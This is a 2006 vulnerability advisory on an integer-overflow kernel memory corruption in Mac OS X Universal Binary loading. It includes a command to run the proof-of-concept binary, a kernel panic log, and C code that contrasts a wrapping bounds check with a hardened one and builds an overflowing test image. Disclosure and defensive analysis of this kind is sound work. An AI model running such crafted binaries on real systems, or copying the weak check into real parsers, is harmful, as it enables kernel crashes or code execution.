Sunday, 26 November 2006

Mac OS X Universal Binary Loading Memory Corruption

Vendor:: Mac
Application:: OS X
Disclosed:: 26-11-06
Description:: Mac OS X fails to properly handle corrupted Universal Binaries, leading to an exploitable memory corruption condition with potential risk of kernel-mode arbitrary code execution. This particular vulnerability is caused by an integer overflow in the fatfile_getarch2() function. Local unprivileged users can abuse this issue with specially crafted Mach-O 'Universal' binaries.
Author:: LMH - discovery, MoKB release, debugging.
Exploit:: The following Mach-O 'Universal' binary can be used to reproduce the bug: MOKB-26-11-2006.bz2
bunzip2 MOKB-26-11-2006.bz2 && ./MOKB-26-11-2006

yssupstae:/tmp evets$ gdb /Volumes/KernelDebugKit/mach_kernel -c core-xnu-792.13.8-172.16.0.10-79aa141d
GNU gdb 6.3.50-20050815 (Apple version gdb-573) (Fri Oct 20 15:50:43 GMT 2006)

[...]
This GDB was configured as "i386-apple-darwin"...
#0 Debugger (message=0x3c9540 "panic") at /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c:770
Line number 770 out of range; /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c has 312 lines.
(gdb) source /Volumes/KernelDebugKit/kgmacros
Loading Kernel GDB Macros package. Type "help kgm" for more info.
(gdb) paniclog
panic(cpu 0 caller 0x001A3135): Unresolved kernel trap (CPU 0, Type 14=page fault), registers:
CR0: 0x80010033, CR2: 0x2524200c, CR3: 0x00d72000, CR4: 0x000006e0
EAX: 0x00000000, EBX: 0x3fffff35, ECX: 0x40000002, EDX: 0x00000000
CR2: 0x2524200c, EBP: 0x13fcb8a8, ESI: 0x2524200c, EDI: 0x00ffffff
EFL: 0x00010206, EIP: 0x00369de4, CS: 0x00000004, DS: 0x02ec000c
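
Added illustrative example, not XNU's code and not the MoKB proof-of-concept above: a user-space check of the fat header that shows how a 32-bit `nfat_arch * sizeof(struct fat_arch)` product can wrap past a "fits in the file" test, beside a version that bounds the count by division and checks each arch's range without overflow. The header layout follows the Mach-O ABI reference linked below; `build_sample` and its values are constructed test data.

```c
#include <stdint.h>
#include <string.h>

/* Fat ("Universal") header layout per the Mach-O ABI reference; all fields are big-endian. */
#define FAT_MAGIC       0xcafebabeU
#define FAT_HEADER_SIZE 8    /* magic, nfat_arch */
#define FAT_ARCH_SIZE   20   /* cputype, cpusubtype, offset, size, align */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
static void put_be32(uint8_t *p, uint32_t v) {
    p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v;
}
/* Weak bound check (illustrative pattern, not XNU's code): the 32-bit product can wrap,
   so an absurd count "fits" and a caller trusting it then walks far past the buffer. */
int naive_archs_fit(const uint8_t *buf, size_t len) {
    if (len < FAT_HEADER_SIZE || be32(buf) != FAT_MAGIC) return 0;
    uint32_t end_of_archs = be32(buf + 4) * FAT_ARCH_SIZE;   /* may wrap */
    return (size_t)end_of_archs + FAT_HEADER_SIZE <= len;
}
/* Hardened validation: bound the count by division (cannot overflow), then check each
   arch's [offset, offset+size) against the file without forming a sum that could wrap.
   Returns the number of accepted arch entries, 0 on rejection. */
uint32_t validate_fat(const uint8_t *buf, size_t len) {
    if (len < FAT_HEADER_SIZE || be32(buf) != FAT_MAGIC) return 0;
    uint32_t nfat_arch = be32(buf + 4);
    size_t avail = len - FAT_HEADER_SIZE;
    if (nfat_arch == 0 || nfat_arch > avail / FAT_ARCH_SIZE) return 0;
    for (uint32_t i = 0; i < nfat_arch; i++) {
        const uint8_t *a = buf + FAT_HEADER_SIZE + (size_t)i * FAT_ARCH_SIZE;
        uint32_t offset = be32(a + 8), size = be32(a + 12);
        if (offset > len || size > len - offset) return 0;
    }
    return nfat_arch;
}

/* Constructed test image (not a real binary): header claiming `nfat_arch` entries, one
   real arch entry pointing at `payload_len` filler bytes. Returns total length written. */
size_t build_sample(uint8_t *out, size_t cap, uint32_t nfat_arch, uint32_t payload_len) {
    size_t total = FAT_HEADER_SIZE + FAT_ARCH_SIZE + payload_len;
    if (total > cap) return 0;
    memset(out, 0, total);
    put_be32(out, FAT_MAGIC);
    put_be32(out + 4, nfat_arch);
    put_be32(out + FAT_HEADER_SIZE + 8, FAT_HEADER_SIZE + FAT_ARCH_SIZE);   /* offset */
    put_be32(out + FAT_HEADER_SIZE + 12, payload_len);                       /* size */
    return total;
}
```

With a claimed count of 0x40000001 the naive product wraps to 20 and the image "fits", while the division-bounded check rejects it before any arch entry is read.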


Links::
Mac OS X ABI Mach-O File Format Reference
